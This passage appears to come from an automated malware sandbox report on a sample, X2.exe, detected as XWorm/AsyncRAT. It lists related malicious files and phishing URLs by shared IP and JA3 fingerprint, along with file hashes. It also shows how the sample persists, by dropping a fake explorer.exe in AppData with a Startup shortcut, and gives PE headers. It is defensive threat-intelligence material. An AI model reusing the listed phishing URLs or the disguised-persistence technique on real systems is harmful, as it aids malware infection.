	http://telegrambot-fix.pages.dev/waysin	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	z1E-catalogSamples.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SamFw Tool 4.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	z0LTqIdZ4A.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
TUT-ASUS	55HUe105hhh123333.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PI88009454 007865EQ.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	Request for Quotation.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Factura E24000319v00. SL.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	208.95.112.1
	QUOTATION_APRQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Wire Transfer Payment Receipt#2024-22-04.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	cb9YYjPyUR.jar	Get hash	malicious	STRRAT	Browse	208.95.112.1
	Ship Docs_ CI_BL_HBL_.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	sZXuT60Q6P.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://www.admin-longin.co.jp.mc3lva.cn/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://wmicrosouab-4ba8.udydzj.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	KxgGGaiW3E.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Flookerstudio%2Egoogle%2Ecom%2Fs%2FscrHqwjeA3k&urlhash=dcQj&trk=public_profile-settings_topcard-website	Get hash	malicious	Unknown	Browse	149.154.167.220
	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	CR-FEDEX_TN-775720741041.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\explorer.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\X2.exe
File Type:	Generic INItialization configuration [WIN]
Category:	modified
Size (bytes):	64
Entropy (8bit):	3.6722687970803873
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5:	DE63D53293EBACE29F3F54832D739D40
SHA1:	1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256:	A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512:	10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pfdzrbz.hmr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1twhqbul.0cj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ykowicr.nig.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5a3xxvqq.fu3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5nbalah.m0p.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j55kqhiw.eag.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nizxkupe.dmm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oojkmklw.2fk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rubhzaz3.ru5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sk4mmj53.3yj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0dxijgf.tcm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1o5dnxb.rve.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf4gnsri.10x.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upvh04it.zrg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0z0f4qt.bvs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykqx4vzq.mom.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk

Download File

Process:	C:\Users\user\Desktop\X2.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Apr 23 23:54:18 2024, mtime=Tue Apr 23 23:54:18 2024, atime=Tue Apr 23 23:54:18 2024, length=50688, window=hide
Category:	dropped
Size (bytes):	771
Entropy (8bit):	5.032568519218442
Encrypted:	false
SSDEEP:	12:8tkli4LF/4T8ChJnVY//uJZmSLqYudstjAvwH/DZTERQ0cmV:8GLtVon2kNqYSsJAv+FTEqbm
MD5:	01F351CAA1AED06A6483E8ECAF78127B
SHA1:	F846B0C6DE7DBF9100C93008D6585E9F56F2D56F
SHA-256:	9A037282093A91606D16423088C621D02046E8CC3555F3FC55AE5B99DD6EE3AB
SHA-512:	57E647E0D105AB827F90181CF39FEB8EA5A7911D37EEB721B77837DE950E0BAB69BD87B1713A7E757F85C00E53AAF8303855D029C221EA5794B9340408EF7B2E
Malicious:	false
Preview:	L..................F.... ................................................z.:..DG..Yr?.D..U..k0.&...&.......;..z...n.l....S.1........t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.X............................B...A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW.V.X............................1.l.R.o.a.m.i.n.g.....f.2......X.. .explorer.exe..J......X...X...............................e.x.p.l.o.r.e.r...e.x.e.......Z...............-.......Y...........W..O.....C:\Users\user\AppData\Roaming\explorer.exe........\.....\.....\.....\.....\.e.x.p.l.o.r.e.r...e.x.e.`.......X.......019635...........hT..CrF.f4... ...#.....+...E...hT..CrF.f4... ...#.....+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\explorer.exe

Download File

Process:	C:\Users\user\Desktop\X2.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50688
Entropy (8bit):	5.629295497647623
Encrypted:	false
SSDEEP:	768:FpJRqkmuoYiL7pr4y9iIn0N+LJwdFNt9cHpa6vOAh2HVXj+T3I:FpJRqVRNr42uNBFf9ipa6vOAwVST3I
MD5:	F8C0512008DAFF966EF349E7178D1239
SHA1:	2A74048CF5009AB0F850E3992FFE7A453E3E18A5
SHA-256:	B019A47DC528A7197129ADEC69EA6813C28E60884C267CD297524296861A9ED6
SHA-512:	F8C208DA88E213F96531B09EA4CDFFD82368373AEB9868F11E35135052CF80FFCEB89C64DA83969AA2DF3505579FEFC673A0E6346B3B6C361A7D29089F56A3FA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82% Antivirus: Virustotal, Detection: 66%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'f................................. ........@.. ....................... ............@.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H.......Hp...j............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.629295497647623
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	X2.exe
File size:	50'688 bytes
MD5:	f8c0512008daff966ef349e7178d1239
SHA1:	2a74048cf5009ab0f850e3992ffe7a453e3e18a5
SHA256:	b019a47dc528a7197129adec69ea6813c28e60884c267cd297524296861a9ed6
SHA512:	f8c208da88e213f96531b09ea4cdffd82368373aeb9868f11e35135052cf80ffceb89c64da83969aa2df3505579fefc673a0e6346b3b6c361a7d29089f56a3fa
SSDEEP:	768:FpJRqkmuoYiL7pr4y9iIn0N+LJwdFNt9cHpa6vOAh2HVXj+T3I:FpJRqVRNr42uNBFf9ipa6vOAwVST3I
TLSH:	39335A883BD00612D9FE6BF91872A6024631F9135913E79E0CD499EB6F27BC08D417E7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'f................................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40db8e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6627F5EE [Tue Apr 23 17:54:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xdb3c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x4c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbb94	0xbc00	aa9ef50c3817cc33cb1e7d8b19d836c7	False	0.48246343085106386	data	5.728275959348203	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
